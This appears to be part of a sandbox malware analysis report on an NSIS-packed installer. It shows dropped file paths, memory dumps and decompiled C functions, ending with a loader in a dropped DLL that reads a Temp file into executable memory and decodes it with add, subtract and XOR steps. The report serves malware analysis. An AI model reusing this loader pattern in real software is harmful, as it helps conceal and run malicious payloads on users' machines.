                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
                          • C:\Users\user\AppData\Roaming\sspgadrjncoy, xrefs: 00402CB6, 00402CBB, 00402CC1
                          • Inst, xrefs: 00402D42
                          • "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" , xrefs: 00402C68
                          • C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
                          • Error launching installer, xrefs: 00402CAB
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
                          • p>u, xrefs: 00402EBD
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\sspgadrjncoy$C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$p>u$soft
                          • API String ID: 2803837635-2094738190
                          • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                          • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                          • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                          • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 316 401734-401757 call 4029e8 call 4055e5 321 401761-401773 call 405a85 call 405578 lstrcatA 316->321 322 401759-40175f call 405a85 316->322 327 401778-40177e call 405ce3 321->327 322->327 332 401783-401787 327->332 333 401789-401793 call 405d7c 332->333 334 4017ba-4017bd 332->334 341 4017a5-4017b7 333->341 342 401795-4017a3 CompareFileTime 333->342 336 4017c5-4017e1 call 40575c 334->336 337 4017bf-4017c0 call 40573d 334->337 344 4017e3-4017e6 336->344 345 401859-401882 call 404e23 call 402f01 336->345 337->336 341->334 342->341 346 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 344->346 347 40183b-401845 call 404e23 344->347 357 401884-401888 345->357 358 40188a-401896 SetFileTime 345->358 346->332 379 401830-401831 346->379 359 40184e-401854 347->359 357->358 362 40189c-4018a7 FindCloseChangeNotification 357->362 358->362 363 402886 359->363 366 40287d-402880 362->366 367 4018ad-4018b0 362->367 364 402888-40288c 363->364 366->363 369 4018b2-4018c3 call 405aa7 lstrcatA 367->369 370 4018c5-4018c8 call 405aa7 367->370 376 4018cd-402205 call 405346 369->376 370->376 376->364 383 40264e-402655 376->383 379->359 381 401833-401834 379->381 381->347 383->366
                          C-Code - Quality: 75%
                          			E00401734(FILETIME* __ebx, void* __eflags) {
                          				void* _t33;
                          				void* _t41;
                          				void* _t43;
                          				FILETIME* _t49;
                          				FILETIME* _t62;
                          				void* _t64;
                          				signed int _t70;
                          				FILETIME* _t71;
                          				FILETIME* _t75;
                          				signed int _t77;
                          				void* _t80;
                          				CHAR* _t82;
                          				void* _t85;
                          
                          				_t75 = __ebx;
                          				_t82 = E004029E8(0x31);
                          				 *(_t85 - 8) = _t82;
                          				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                          				_t33 = E004055E5(_t82);
                          				_push(_t82);
                          				if(_t33 == 0) {
                          					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                          				} else {
                          					_push(0x409b68);
                          					E00405A85();
                          				}
                          				E00405CE3(0x409b68);
                          				while(1) {
                          					__eflags =  *(_t85 + 8) - 3;
                          					if( *(_t85 + 8) >= 3) {
                          						_t64 = E00405D7C(0x409b68);
                          						_t77 = 0;
                          						__eflags = _t64 - _t75;
                          						if(_t64 != _t75) {
                          							_t71 = _t64 + 0x14;
                          							__eflags = _t71;
                          							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                          						}
                          						asm("sbb eax, eax");
                          						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                          						__eflags = _t70;
                          						 *(_t85 + 8) = _t70;
                          					}
                          					__eflags =  *(_t85 + 8) - _t75;
                          					if( *(_t85 + 8) == _t75) {
                          						E0040573D(0x409b68);
                          					}
                          					__eflags =  *(_t85 + 8) - 1;
                          					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                          					__eflags = _t41 - 0xffffffff;
                          					 *(_t85 - 0x34) = _t41;
                          					if(_t41 != 0xffffffff) {
                          						break;
                          					}
                          					__eflags =  *(_t85 + 8) - _t75;
                          					if( *(_t85 + 8) != _t75) {
                          						E00404E23(0xffffffe2,  *(_t85 - 8));
                          						__eflags =  *(_t85 + 8) - 2;
                          						if(__eflags == 0) {
                          							 *((intOrPtr*)(_t85 - 4)) = 1;
                          						}
                          						L31:
                          						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
                          						__eflags =  *0x423f28;
                          						goto L32;
                          					} else {
                          						E00405A85(0x40a368, 0x424000);
                          						E00405A85(0x424000, 0x409b68);
                          						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\jones\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll",  *((intOrPtr*)(_t85 - 0x10)));
                          						E00405A85(0x424000, 0x40a368);
                          						_t62 = E00405346("C:\Users\jones\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll",  *(_t85 - 0x24) >> 3) - 4;
                          						__eflags = _t62;
                          						if(_t62 == 0) {
                          							continue;
                          						} else {
                          							__eflags = _t62 == 1;
                          							if(_t62 == 1) {
                          								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
                          								L32:
                          								_t49 = 0;
                          								__eflags = 0;
                          							} else {
                          								_push(0x409b68);
                          								_push(0xfffffffa);
                          								E00404E23();
                          								L29:
                          								_t49 = 0x7fffffff;
                          							}
                          						}
                          					}
                          					L33:
                          					return _t49;
                          				}
                          				E00404E23(0xffffffea,  *(_t85 - 8));
                          				 *0x423f54 =  *0x423f54 + 1;
                          				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
                          				 *0x423f54 =  *0x423f54 - 1;
                          				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                          				_t80 = _t43;
                          				if( *(_t85 - 0x18) != 0xffffffff) {
                          					L22:
                          					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                          				} else {
                          					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                          					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                          						goto L22;
                          					}
                          				}
                          				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                          				__eflags = _t80 - _t75;
                          				if(_t80 >= _t75) {
                          					goto L31;
                          				} else {
                          					__eflags = _t80 - 0xfffffffe;
                          					if(_t80 != 0xfffffffe) {
                          						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
                          					} else {
                          						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
                          						lstrcatA(0x409b68,  *(_t85 - 8));
                          					}
                          					_push(0x200010);
                          					_push(0x409b68);
                          					E00405346();
                          					goto L29;
                          				}
                          				goto L33;
                          			}
















                          0x00401734
                          0x0040173b
                          0x00401744
                          0x00401747
                          0x0040174a
                          0x0040174f
                          0x00401757
                          0x00401773
                          0x00401759
                          0x00401759
                          0x0040175a
                          0x0040175a
                          0x00401779
                          0x00401783
                          0x00401783
                          0x00401787
                          0x0040178a
                          0x0040178f
                          0x00401791
                          0x00401793
                          0x00401798
                          0x00401798
                          0x004017a3
                          0x004017a3
                          0x004017b4
                          0x004017b6
                          0x004017b6
                          0x004017b7
                          0x004017b7
                          0x004017ba
                          0x004017bd
                          0x004017c0
                          0x004017c0
                          0x004017c7
                          0x004017d6
                          0x004017db
                          0x004017de
                          0x004017e1
                          0x00000000
                          0x00000000
                          0x004017e3
                          0x004017e6
                          0x00401840
                          0x00401845
                          0x004015a8
                          0x0040264e
                          0x0040264e
                          0x0040287d
                          0x00402880
                          0x00402880
                          0x00000000
                          0x004017e8
                          0x004017ee
                          0x004017f9
                          0x00401806
                          0x00401811
                          0x00401827
                          0x00401827
                          0x0040182a
                          0x00000000
                          0x00401830
                          0x00401830
                          0x00401831
                          0x0040184e
                          0x00402886
                          0x00402886
                          0x00402886
                          0x00401833
                          0x00401833
                          0x00401834
                          0x00401492
                          0x00402200
                          0x00402200
                          0x00402200
                          0x00401831
                          0x0040182a
                          0x00402888
                          0x0040288c
                          0x0040288c
                          0x0040185e
                          0x00401863
                          0x00401871
                          0x00401876
                          0x0040187c
                          0x00401880
                          0x00401882
                          0x0040188a
                          0x00401896
                          0x00401884
                          0x00401884
                          0x00401888
                          0x00000000
                          0x00000000
                          0x00401888
                          0x0040189f
                          0x004018a5
                          0x004018a7
                          0x00000000
                          0x004018ad
                          0x004018ad
                          0x004018b0
                          0x004018c8
                          0x004018b2
                          0x004018b5
                          0x004018be
                          0x004018be
                          0x004018cd
                          0x004018d2
                          0x004021fb
                          0x00000000
                          0x004021fb
                          0x00000000

                          APIs
                          • lstrcatA.KERNEL32(00000000,00000000,xzfdi,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                          • CompareFileTime.KERNEL32(-00000014,?,xzfdi,xzfdi,00000000,00000000,xzfdi,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                            • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,heifsmlbdxlebvytfzg Setup,NSIS Error), ref: 00405A92
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp$C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll$xzfdi
                          • API String ID: 1941528284-4009907762
                          • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                          • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                          • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                          • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 384 40302c-403055 GetTickCount 385 403196-40319e call 402bc5 384->385 386 40305b-403086 call 4031da SetFilePointer 384->386 391 4031a0-4031a5 385->391 392 40308b-40309d 386->392 393 4030a1-4030af call 4031a8 392->393 394 40309f 392->394 397 4030b5-4030c1 393->397 398 403188-40318b 393->398 394->393 399 4030c7-4030cd 397->399 398->391 400 4030f8-403114 call 405e9d 399->400 401 4030cf-4030d5 399->401 407 403191 400->407 408 403116-40311e 400->408 401->400 402 4030d7-4030f7 call 402bc5 401->402 402->400 409 403193-403194 407->409 410 403120-403136 WriteFile 408->410 411 403152-403158 408->411 409->391 413 403138-40313c 410->413 414 40318d-40318f 410->414 411->407 412 40315a-40315c 411->412 412->407 415 40315e-403171 412->415 413->414 416 40313e-40314a 413->416 414->409 415->392 417 403177-403186 SetFilePointer 415->417 416->399 418 403150 416->418 417->385 418->415
                          C-Code - Quality: 94%
                          			E0040302C(intOrPtr _a4) {
                          				long _v4;
                          				void* __ecx;
                          				intOrPtr _t12;
                          				intOrPtr _t13;
                          				signed int _t14;
                          				void* _t16;
                          				void* _t17;
                          				long _t18;
                          				int _t21;
                          				intOrPtr _t22;
                          				intOrPtr _t34;
                          				long _t35;
                          				intOrPtr _t37;
                          				void* _t39;
                          				long _t40;
                          				intOrPtr _t46;
                          				intOrPtr _t47;
                          				intOrPtr _t53;
                          
                          				_t35 =  *0x41703c; // 0x50207
                          				_t37 = _t35 -  *0x40afa8 + _a4;
                          				 *0x423eac = GetTickCount() + 0x1f4;
                          				if(_t37 <= 0) {
                          					L23:
                          					E00402BC5(1);
                          					return 0;
                          				}
                          				E004031DA( *0x41f04c);
                          				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
                          				 *0x41f048 = _t37;
                          				 *0x417038 = 0;
                          				while(1) {
                          					L2:
                          					_t12 =  *0x417040; // 0x4cef1
                          					_t34 = 0x4000;
                          					_t13 = _t12 -  *0x41f04c;
                          					if(_t13 <= 0x4000) {
                          						_t34 = _t13;
                          					}
                          					_t14 = E004031A8(0x413038, _t34); // executed
                          					if(_t14 == 0) {
                          						break;
                          					}
                          					 *0x41f04c =  *0x41f04c + _t34;
                          					 *0x40afc8 = 0x413038;
                          					 *0x40afcc = _t34;
                          					while(1) {
                          						_t46 =  *0x423eb0; // 0x753e70
                          						if(_t46 != 0) {
                          							_t47 =  *0x423f40; // 0x0
                          							if(_t47 == 0) {
                          								_t22 =  *0x41f048; // 0x32d2
                          								 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
                          								E00402BC5(0);
                          							}
                          						}
                          						 *0x40afd0 = 0x40b038;
                          						 *0x40afd4 = 0x8000; // executed
                          						_t16 = E00405E9D(0x40afb0); // executed
                          						if(_t16 < 0) {
                          							break;
                          						}
                          						_t39 =  *0x40afd0; // 0x40e30a
                          						_t40 = _t39 - 0x40b038;
                          						if(_t40 == 0) {
                          							__eflags =  *0x40afcc; // 0x0
                          							if(__eflags != 0) {
                          								break;
                          							}
                          							__eflags = _t34;
                          							if(_t34 == 0) {
                          								break;
                          							}
                          							L17:
                          							_t18 =  *0x41703c; // 0x50207
                          							if(_t18 -  *0x40afa8 + _a4 > 0) {
                          								goto L2;
                          							}
                          							SetFilePointer( *0x409014, _t18, 0, 0); // executed
                          							goto L23;
                          						}
                          						_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
                          						if(_t21 == 0 || _t40 != _v4) {
                          							_push(0xfffffffe);
                          							L22:
                          							_pop(_t17);
                          							return _t17;
                          						} else {
                          							 *0x40afa8 =  *0x40afa8 + _t40;
                          							_t53 =  *0x40afcc; // 0x0
                          							if(_t53 != 0) {
                          								continue;
                          							}
                          							goto L17;
                          						}
                          					}
                          					_push(0xfffffffd);
                          					goto L22;
                          				}
                          				return _t14 | 0xffffffff;
                          			}





















                          0x00403030
                          0x0040303d
                          0x00403050
                          0x00403055
                          0x00403196
                          0x00403198
                          0x00000000
                          0x0040319e
                          0x00403061
                          0x00403074
                          0x0040307a
                          0x00403080
                          0x0040308b
                          0x0040308b
                          0x0040308b
                          0x00403090
                          0x00403095
                          0x0040309d
                          0x0040309f
                          0x0040309f
                          0x004030a8
                          0x004030af
                          0x00000000
                          0x00000000
                          0x004030b5
                          0x004030bb
                          0x004030c1
                          0x004030c7
                          0x004030c7
                          0x004030cd
                          0x004030cf
                          0x004030d5
                          0x004030d7
                          0x004030ed
                          0x004030f2
                          0x004030f7
                          0x004030d5
                          0x004030fd
                          0x00403103
                          0x0040310d
                          0x00403114
                          0x00000000
                          0x00000000
                          0x00403116
                          0x0040311c
                          0x0040311e
                          0x00403152
                          0x00403158
                          0x00000000
                          0x00000000
                          0x0040315a
                          0x0040315c
                          0x00000000
                          0x00000000
                          0x0040315e
                          0x0040315e
                          0x00403171
                          0x00000000
                          0x00000000
                          0x00403180
                          0x00000000
                          0x00403180
                          0x0040312e
                          0x00403136
                          0x0040318d
                          0x00403193
                          0x00403193
                          0x00000000
                          0x0040313e
                          0x0040313e
                          0x00403144
                          0x0040314a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403150
                          0x00403136
                          0x00403191
                          0x00000000
                          0x00403191
                          0x00000000

                          APIs
                          • GetTickCount.KERNEL32 ref: 00403041
                            • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,0000B5E4), ref: 004031E8
                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                          • WriteFile.KERNELBASE(0040B038,0040E30A,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                          • SetFilePointer.KERNELBASE(00050207,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: File$Pointer$CountTickWrite
                          • String ID: @$80A$p>u
                          • API String ID: 2146148272-4220586700
                          • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                          • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                          • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                          • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 419 402f01-402f10 420 402f12-402f28 SetFilePointer 419->420 421 402f2e-402f39 call 40302c 419->421 420->421 424 403025-403029 421->424 425 402f3f-402f59 ReadFile 421->425 426 403022 425->426 427 402f5f-402f62 425->427 428 403024 426->428 427->426 429 402f68-402f7b call 40302c 427->429 428->424 429->424 432 402f81-402f84 429->432 433 402ff1-402ff7 432->433 434 402f86-402f89 432->434 437 402ff9 433->437 438 402ffc-40300f ReadFile 433->438 435 40301d-403020 434->435 436 402f8f 434->436 435->424 439 402f94-402f9c 436->439 437->438 438->426 440 403011-40301a 438->440 441 402fa1-402fb3 ReadFile 439->441 442 402f9e 439->442 440->435 441->426 443 402fb5-402fb8 441->443 442->441 443->426 444 402fba-402fcf WriteFile 443->444 445 402fd1-402fd4 444->445 446 402fed-402fef 444->446 445->446 447 402fd6-402fe9 445->447 446->428 447->439 448 402feb 447->448 448->435
                          C-Code - Quality: 93%
                          			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                          				long _v8;
                          				intOrPtr _v12;
                          				void _t31;
                          				intOrPtr _t32;
                          				int _t35;
                          				long _t36;
                          				int _t37;
                          				long _t38;
                          				int _t40;
                          				int _t42;
                          				long _t43;
                          				long _t44;
                          				intOrPtr _t51;
                          				long _t55;
                          				long _t57;
                          
                          				_t31 = _a4;
                          				if(_t31 >= 0) {
                          					_t51 =  *0x423ef8; // 0x5c89
                          					_t44 = _t31 + _t51;
                          					 *0x41703c = _t44;
                          					SetFilePointer( *0x409014, _t44, 0, 0); // executed
                          				}
                          				_t57 = 4;
                          				_t32 = E0040302C(_t57);
                          				if(_t32 >= 0) {
                          					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
                          					if(_t35 == 0 || _v8 != _t57) {
                          						L23:
                          						_push(0xfffffffd);
                          						goto L24;
                          					} else {
                          						 *0x41703c =  *0x41703c + _t57;
                          						_t32 = E0040302C(_a4);
                          						_v12 = _t32;
                          						if(_t32 >= 0) {
                          							if(_a12 != 0) {
                          								_t36 = _a4;
                          								if(_t36 >= _a16) {
                          									_t36 = _a16;
                          								}
                          								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
                          								if(_t37 == 0) {
                          									goto L23;
                          								} else {
                          									_t38 = _v8;
                          									 *0x41703c =  *0x41703c + _t38;
                          									_v12 = _t38;
                          									goto L22;
                          								}
                          							} else {
                          								if(_a4 <= 0) {
                          									L22:
                          									_t32 = _v12;
                          								} else {
                          									while(1) {
                          										_t55 = 0x4000;
                          										if(_a4 < 0x4000) {
                          											_t55 = _a4;
                          										}
                          										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
                          										if(_t40 == 0 || _t55 != _v8) {
                          											goto L23;
                          										}
                          										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
                          										if(_t42 == 0 || _a16 != _t55) {
                          											_push(0xfffffffe);
                          											L24:
                          											_pop(_t32);
                          										} else {
                          											_t43 = _v8;
                          											_v12 = _v12 + _t43;
                          											_a4 = _a4 - _t43;
                          											 *0x41703c =  *0x41703c + _t43;
                          											if(_a4 > 0) {
                          												continue;
                          											} else {
                          												goto L22;
                          											}
                          										}
                          										goto L25;
                          									}
                          									goto L23;
                          								}
                          							}
                          						}
                          					}
                          				}
                          				L25:
                          				return _t32;
                          			}


















                          0x00402f06
                          0x00402f10
                          0x00402f12
                          0x00402f19
                          0x00402f1d
                          0x00402f28
                          0x00402f28
                          0x00402f30
                          0x00402f32
                          0x00402f39
                          0x00402f55
                          0x00402f59
                          0x00403022
                          0x00403022
                          0x00000000
                          0x00402f68
                          0x00402f6b
                          0x00402f71
                          0x00402f78
                          0x00402f7b
                          0x00402f84
                          0x00402ff1
                          0x00402ff7
                          0x00402ff9
                          0x00402ff9
                          0x0040300b
                          0x0040300f
                          0x00000000
                          0x00403011
                          0x00403011
                          0x00403014
                          0x0040301a
                          0x00000000
                          0x0040301a
                          0x00402f86
                          0x00402f89
                          0x0040301d
                          0x0040301d
                          0x00402f8f
                          0x00402f94
                          0x00402f94
                          0x00402f9c
                          0x00402f9e
                          0x00402f9e
                          0x00402faf
                          0x00402fb3
                          0x00000000
                          0x00000000
                          0x00402fc7
                          0x00402fcf
                          0x00402fed
                          0x00403024
                          0x00403024
                          0x00402fd6
                          0x00402fd6
                          0x00402fd9
                          0x00402fdc
                          0x00402fdf
                          0x00402fe9
                          0x00000000
                          0x00402feb
                          0x00000000
                          0x00402feb
                          0x00402fe9
                          0x00000000
                          0x00402fcf
                          0x00000000
                          0x00402f94
                          0x00402f89
                          0x00402f84
                          0x00402f7b
                          0x00402f59
                          0x00403025
                          0x00403029

                          APIs
                          • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,0000B5E4), ref: 00402F28
                          • ReadFile.KERNELBASE(00409128,00000004,0000B5E4,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                          • ReadFile.KERNELBASE(00413038,00004000,0000B5E4,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,0000B5E4), ref: 00402FAF
                          • WriteFile.KERNELBASE(00000000,00413038,0000B5E4,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,0000B5E4), ref: 00402FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: File$Read$PointerWrite
                          • String ID: 80A
                          • API String ID: 2113905535-195308239
                          • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                          • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                          • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                          • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 97%
                          			E6F3A1070(void* __ebx) {
                          				long _v8;
                          				void* _v12;
                          				long _v16;
                          				void* _v20;
                          				short _v22;
                          				short _v24;
                          				short _v26;
                          				short _v28;
                          				short _v30;
                          				short _v32;
                          				short _v34;
                          				short _v36;
                          				short _v38;
                          				char _v40;
                          				long _v44;
                          				short _v1084;
                          				void* _t97;
                          				void* _t100;
                          				signed int _t104;
                          				void* _t106;
                          				void* _t137;
                          				_Unknown_base(*)()* _t149;
                          				long _t187;
                          
                          				_t137 = __ebx;
                          				_push(__ebx);
                          				_v40 = 0x74;
                          				_v38 = 0x61;
                          				_v36 = 0x75;
                          				_v34 = 0x64;
                          				_v32 = 0x6f;
                          				_v30 = 0x73;
                          				_v28 = 0x77;
                          				_v26 = 0x79;
                          				_v24 = 0x6f;
                          				_v22 = 0;
                          				GetTempPathW(0x103,  &_v1084);
                          				E6F3A1000( &_v1084,  &_v40);
                          				_t97 = CreateFileW( &_v1084, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                          				_v20 = _t97;
                          				_v16 = GetFileSize(_v20, 0);
                          				_t100 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
                          				_v12 = _t100;
                          				_t187 = _v16;
                          				ReadFile(_v20, _v12, _t187,  &_v44, 0); // executed
                          				_v8 = 0;
                          				while(_v8 < _v16) {
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) + 0x35;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xac;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000072;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000090;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0x21;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xaf;
